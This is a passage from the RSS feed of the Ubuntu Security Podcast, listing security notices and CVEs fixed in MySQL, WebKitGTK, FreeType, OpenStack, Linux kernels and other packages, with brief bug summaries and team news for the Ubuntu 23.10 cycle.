<li><a href="https://ubuntu.com/security/CVE-2023-21980">CVE-2023-21980</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21912">CVE-2023-21912</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest upstream releases
<ul>
<li>8.0.33 for 20.04 LTS, 22.04 LTS, 22.10, and Lunar (23.04)</li>
<li>5.7.42 for 16.04 ESM and 18.04 LTS</li>
</ul>
</li>
<li>As is the latest upstream point release, also includes bug fixes and possibly
new features / incompatible changes - full list of details from upstream:
<ul>
<li><a href="https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-42.html">https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-42.html</a></li>
<li><a href="https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-33.html">https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-33.html</a></li>
</ul>
</li>
</ul>
<h3 id="usn-6061-1-webkitgtk-vulnerabilities--08-14">[<a href="https://ubuntu.com/security/notices/USN-6061-1">USN-6061-1</a>] WebKitGTK vulnerabilities (08:14)</h3>
<ul>
<li>6 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28205">CVE-2023-28205</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-27954">CVE-2023-27954</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-27932">CVE-2023-27932</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25358">CVE-2023-25358</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32885">CVE-2022-32885</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0108">CVE-2022-0108</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various UAFs plus ability to track users across origins or bypass same origin
policy</li>
</ul>
<h3 id="usn-6062-1-freetype-vulnerability--08-38">[<a href="https://ubuntu.com/security/notices/USN-6062-1">USN-6062-1</a>] FreeType vulnerability (08:38)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2004">CVE-2023-2004</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Integer overflow when parsing a malformed font - DoS / RCE (particurly with
the advent of web fonts)</li>
</ul>
<h3 id="usn-6063-1-ceph-vulnerabilities--09-03">[<a href="https://ubuntu.com/security/notices/USN-6063-1">USN-6063-1</a>] Ceph vulnerabilities (09:03)</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3854">CVE-2022-3854</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3650">CVE-2022-3650</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0670">CVE-2022-0670</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3979">CVE-2021-3979</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>backport of:
<ul>
<li>17.2.5 for 22.10, 22.04 LTS</li>
<li>15.2.17 for 20.04 LTS</li>
<li>12.2.13 for 18.04 LTS</li>
</ul>
</li>
</ul>
<h3 id="usn-6066-1-openstack-heat-vulnerability--09-29">[<a href="https://ubuntu.com/security/notices/USN-6066-1">USN-6066-1</a>] OpenStack Heat vulnerability (09:29)</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1625">CVE-2023-1625</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Orchestration Service for OpenStack - info leak via API</li>
</ul>
<h3 id="usn-6067-1-openstack-neutron-vulnerabilities--09-39">[<a href="https://ubuntu.com/security/notices/USN-6067-1">USN-6067-1</a>] OpenStack Neutron vulnerabilities (09:39)</h3>
<ul>
<li>5 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3277">CVE-2022-3277</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-40797">CVE-2021-40797</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-40085">CVE-2021-40085</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38598">CVE-2021-38598</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20267">CVE-2021-20267</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Virtual Network Service</li>
</ul>
<h3 id="usn-6068-1-open-vswitch-vulnerability--09-45">[<a href="https://ubuntu.com/security/notices/USN-6068-1">USN-6068-1</a>] Open vSwitch vulnerability (09:45)</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1668">CVE-2023-1668</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to properly handle IP packets which specified a protocol of 0 (used in
IPv6 to specify hop-by-hop options) - if a packet with protocol 0 was
encountered, OVS would install a dataflow path for both kernel and userspace
which would match on ALL IP protocols for this flow - so this would then
possibly match against other IP packets and so cause them to be handled
incorrectly (possibly allowing when should have been denied etc)</li>
</ul>
<h3 id="usn-6065-1-css-what-vulnerabilities--10-43">[<a href="https://ubuntu.com/security/notices/USN-6065-1">USN-6065-1</a>] css-what vulnerabilities (10:43)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-21222">CVE-2022-21222</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33587">CVE-2021-33587</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>CSS selector parser for NodeJS</li>
<li>Two ReDoS issues</li>
</ul>
<h3 id="usn-6064-1-sql-parse-vulnerability--11-00">[<a href="https://ubuntu.com/security/notices/USN-6064-1">USN-6064-1</a>] SQL parse vulnerability (11:00)</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-30608">CVE-2023-30608</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Another ReDoS</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-23-dot-10-release-cycle-opens--11-41">Ubuntu 23.10 release cycle opens (11:41)</h3>
<ul>
<li>The Ubuntu Security is back from Prague (Engineering Sprint) - spent the week
diving deep into various aspects like what kinds of tooling and processes we
want to try and improve across the team, talking about the culture and history
of the team to make sure we maintain our great culture as the team grows.</li>
<li>Even discussing mundane stuff like how to refer to and name security updates
which go into Ubuntu Pro vs the regular Ubuntu Archive - making sure it is
clear to consumers of our USNs etc what is where, plus the various policies
around updated for Ubuntu Pro</li>
<li>Sessions devoted to snaps and how to do appropriate security reviews for them
plus how to coordinate better with the snapd team</li>
<li>Even looking at tech debt within our team and our tooling and how we can try
and tackle some of that</li>
<li>As for more concrete plans for the security team during 23.10
<ul>
<li>continue the work to use AppArmor to enable tighter controls over
unprivileged user namespaces within Ubuntu</li>
<li>various improvements to our <a href="https://ubuntu.com/security/oval">OVAL</a> feeds to make them more useful to users and
customers alike</li>
<li>utilising the Canonical Hardware Certifications Lab for testing of security
updates for packages that require particular hardware (think things like
<code>intel-microcode</code>, <code>nvme-cli</code>, various graphics drivers etc)</li>
<li>Improvements to AppArmor for more fine-grained network mediation and
<code>io_uring</code></li>
<li>More work on supporting various confidential computing use-cases (for an
introduction to these types of topics see
<a href="https://ubuntu.com/engage/introduction-to-confidential-computing-webinar">https://ubuntu.com/engage/introduction-to-confidential-computing-webinar</a>)</li>
<li>Usual work on FIPS / CIS / DISA-STIG updates plus usual security maintenance</li>
</ul>
</li>
</ul>
<h3 id="academic-paper-review-with-andrei-iosif--14-40">Academic paper review with Andrei Iosif (14:40)</h3>
<ul>
<li>New segment to dig into the details of various interesting cybersecurity
research papers</li>
<li>Andrei joined the team just over 1 month ago - previously was Tech Lead at a
SecOps startup developing open source tools for automating various
cybersecurity solutions - brings a wide range of great experience to our team</li>
<li><a href="https://dl.acm.org/doi/10.1145/3469659">Modeling Realistic Adversarial Attacks against Network Intrusion Detection Systems</a></li>
<li>Looks at what the study was about (developing a model for attacks against
Network Intrusion Detection Systems, with a particular focus on IDSs that are
based on AI/ML approaches)</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E194.mp3" length="25981353" type="audio/mpeg" /><itunes:duration>1470</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 193
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-193/</link>
          <pubDate>Thu, 13 Apr 2023 23:12:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>70e7fb923d4c039ab0a884687aa51c031dca7022501bfcd834ad27a6db9aa42077a72aafcfe14e157debbdda6ac68b5c5f714c31abbd0ca60d04d52e67f9a775</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 193</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          The release of Ubuntu 23.04 Lunar Lobster is nigh so we take a look at some of
  the things the security team has been doing along the way, plus it's our 6000th
  USN so we look back at the last 19 years of USNs whilst covering security...
        
        ]]></itunes:subtitle>
        <itunes:summary>  The release of Ubuntu 23.04 Lunar Lobster is nigh so we take a look at some of
  the things the security team has been doing along the way, plus it's our 6000th
  USN so we look back at the last 19 years of USNs whilst covering security
  updates for the Linux kernel, Emacs, Irssi, Sudo, Firefox and more.
  </itunes:summary>
        <description>  The release of Ubuntu 23.04 Lunar Lobster is nigh so we take a look at some of
  the things the security team has been doing along the way, plus it's our 6000th
  USN so we look back at the last 19 years of USNs whilst covering security
  updates for the Linux kernel, Emacs, Irssi, Sudo, Firefox and more.
  </description>
        <googleplay:description>  The release of Ubuntu 23.04 Lunar Lobster is nigh so we take a look at some of
  the things the security team has been doing along the way, plus it's our 6000th
  USN so we look back at the last 19 years of USNs whilst covering security
  updates for the Linux kernel, Emacs, Irssi, Sudo, Firefox and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>The release of Ubuntu 23.04 Lunar Lobster is nigh so we take a look at some of
the things the security team has been doing along the way, plus it&rsquo;s our 6000th
USN so we look back at the last 19 years of USNs whilst covering security
updates for the Linux kernel, Emacs, Irssi, Sudo, Firefox and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>109 unique CVEs addressed</p>
<h3 id="usn-5998-1-apache-log4j-vulnerabilities--01-00">[<a href="https://ubuntu.com/security/notices/USN-5998-1">USN-5998-1</a>] Apache Log4j vulnerabilities (01:00)</h3>
<ul>
<li>4 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-23307">CVE-2022-23307</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23305">CVE-2022-23305</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23302">CVE-2022-23302</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17571">CVE-2019-17571</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>A bunch of older vulnerabilities, some discovered in the wake of log4shell but
not deemed as critical</li>
</ul>
<h3 id="usn-6000-1-linux-kernel--bluefield--vulnerabilities--01-37">[<a href="https://ubuntu.com/security/notices/USN-6000-1">USN-6000-1</a>] Linux kernel (BlueField) vulnerabilities (01:37)</h3>
<ul>
<li>23 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28328">CVE-2023-28328</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-26607">CVE-2023-26607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23455">CVE-2023-23455</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23454">CVE-2023-23454</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20938">CVE-2023-20938</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1382">CVE-2023-1382</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0394">CVE-2023-0394</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0266">CVE-2023-0266</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0045">CVE-2023-0045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-47929">CVE-2022-47929</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-47520">CVE-2022-47520</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42329">CVE-2022-42329</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42328">CVE-2022-42328</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4139">CVE-2022-4139</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41218">CVE-2022-41218</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36280">CVE-2022-36280</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3623">CVE-2022-3623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3545">CVE-2022-3545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3521">CVE-2022-3521</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3435">CVE-2022-3435</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3424">CVE-2022-3424</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3169">CVE-2022-3169</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0461">CVE-2023-0461</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>NVIDIA BlueField specific kernel (5.4)</li>
<li>Most high priority CVE UAF in Upper Level Protocol (mentioned in the last few
episodes)</li>
<li>6000th USN published by the Ubuntu Security team - this one by Rodrigo Zaiden</li>
<li>Out of interest:
<ul>
<li><a href="https://ubuntu.com/security/notices/USN-6000-1">USN-5000-1</a> - also a kernel USN in June 2021 (Steve Beattie)</li>
<li><a href="https://ubuntu.com/security/notices/USN-4000-1">USN-4000-1</a> - corosync in May 2019 (Leo Barbosa)</li>
<li><a href="https://ubuntu.com/security/notices/USN-3000-1">USN-3000-1</a> - kernel (utopic HWE backported to trusty) in June 2016 (John Johansen)</li>
<li><a href="https://ubuntu.com/security/notices/USN-2000-1">USN-2000-1</a> - nova in October 2013 (Jamie Strandboge)</li>
<li><a href="https://ubuntu.com/security/notices/USN-1000-1">USN-1000-1</a> - kernel again in October 2010 (Kees Cook)</li>
<li><a href="https://ubuntu.com/security/notices/USN-1-1">USN-1-1</a> - libpng again in October 2004 (Matt Zimmerman)</li>
</ul>
</li>
</ul>
<h3 id="usn-6001-1-linux-kernel--aws--vulnerabilities--04-18">[<a href="https://ubuntu.com/security/notices/USN-6001-1">USN-6001-1</a>] Linux kernel (AWS) vulnerabilities (04:18)</h3>
<ul>
<li>51 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1118">CVE-2023-1118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-26607">CVE-2023-26607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-26545">CVE-2023-26545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23455">CVE-2023-23455</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1095">CVE-2023-1095</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1074">CVE-2023-1074</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0394">CVE-2023-0394</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-47929">CVE-2022-47929</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4662">CVE-2022-4662</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41850">CVE-2022-41850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41849">CVE-2022-41849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41218">CVE-2022-41218</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39188">CVE-2022-39188</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3903">CVE-2022-3903</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36879">CVE-2022-36879</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3646">CVE-2022-3646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36280">CVE-2022-36280</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3628">CVE-2022-3628</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3303">CVE-2022-3303</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3111">CVE-2022-3111</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3061">CVE-2022-3061</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2991">CVE-2022-2991</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2663">CVE-2022-2663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2380">CVE-2022-2380</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2318">CVE-2022-2318</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2503">CVE-2022-2503</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20572">CVE-2022-20572</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20132">CVE-2022-20132</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1975">CVE-2022-1975</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1974">CVE-2022-1974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1516">CVE-2022-1516</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1462">CVE-2022-1462</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1205">CVE-2022-1205</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1195">CVE-2022-1195</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1016">CVE-2022-1016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0617">CVE-2022-0617</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0494">CVE-2022-0494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0487">CVE-2022-0487</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45868">CVE-2021-45868</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4203">CVE-2021-4203</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4149">CVE-2021-4149</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3772">CVE-2021-3772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3732">CVE-2021-3732</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3669">CVE-2021-3669</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3659">CVE-2021-3659</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3428">CVE-2021-3428</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28713">CVE-2021-28713</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28712">CVE-2021-28712</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28711">CVE-2021-28711</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-26401">CVE-2021-26401</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36516">CVE-2020-36516</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 kernel - wins the prize for the most number of CVEs fixed in a single
update this week - thanks as always to the kernel team for all their work on
these</li>
</ul>
<h3 id="usn-6004-1-linux-kernel--intel-iotg--vulnerabilities--04-42">[<a href="https://ubuntu.com/security/notices/USN-6004-1">USN-6004-1</a>] Linux kernel (Intel IoTG) vulnerabilities (04:42)</h3>
<ul>
<li>15 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28328">CVE-2023-28328</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-26606">CVE-2023-26606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23559">CVE-2023-23559</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23455">CVE-2023-23455</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23454">CVE-2023-23454</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0266">CVE-2023-0266</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0210">CVE-2023-0210</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0045">CVE-2023-0045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48424">CVE-2022-48424</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48423">CVE-2022-48423</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4382">CVE-2022-4382</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41218">CVE-2022-41218</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36280">CVE-2022-36280</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3424">CVE-2022-3424</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2196">CVE-2022-2196</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 kernel</li>
</ul>
<h3 id="usn-6007-1-linux-kernel--gcp--vulnerabilities--04-51">[<a href="https://ubuntu.com/security/notices/USN-6007-1">USN-6007-1</a>] Linux kernel (GCP) vulnerabilities (04:51)</h3>
<ul>
<li>20 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-26607">CVE-2023-26607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43750">CVE-2022-43750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42895">CVE-2022-42895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42329">CVE-2022-42329</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42328">CVE-2022-42328</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41850">CVE-2022-41850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41849">CVE-2022-41849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39842">CVE-2022-39842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3649">CVE-2022-3649</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3646">CVE-2022-3646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3640">CVE-2022-3640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3628">CVE-2022-3628</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3545">CVE-2022-3545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3521">CVE-2022-3521</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29901">CVE-2022-29901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29900">CVE-2022-29900</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2663">CVE-2022-2663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26373">CVE-2022-26373</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20369">CVE-2022-20369</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0461">CVE-2023-0461</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 (backported from 18.04 LTS)</li>
</ul>
<h3 id="usn-6009-1-linux-kernel--gcp--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6009-1">USN-6009-1</a>] Linux kernel (GCP) vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28328">CVE-2023-28328</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23559">CVE-2023-23559</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23455">CVE-2023-23455</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0394">CVE-2023-0394</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0266">CVE-2023-0266</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0045">CVE-2023-0045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-47929">CVE-2022-47929</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41218">CVE-2022-41218</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36280">CVE-2022-36280</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3424">CVE-2022-3424</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3669">CVE-2021-3669</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>follow-up kernel update including a bunch more fixes</li>
</ul>
<h3 id="usn-6003-1-emacs-vulnerability--05-03">[<a href="https://ubuntu.com/security/notices/USN-6003-1">USN-6003-1</a>] Emacs vulnerability (05:03)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28617">CVE-2023-28617</a> <!-- raw HTML omitted --></li>
</ul>
</li>
